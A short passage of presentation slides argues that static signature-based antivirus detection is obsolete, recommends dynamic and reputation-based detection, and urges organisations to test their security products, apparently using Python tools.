⊡ Some companies did this anyway...
52. Better Options
⊡ Static string based antivirus detection is dead
⊡ Move to dynamic analysis and reputation
based detection
53. Test Your Security
⊡ Start testing your security “solutions” so you
know the level of protection they provide
⊡ Determine the level of risk security products
introduce
⊡ Python provided the way for us to do this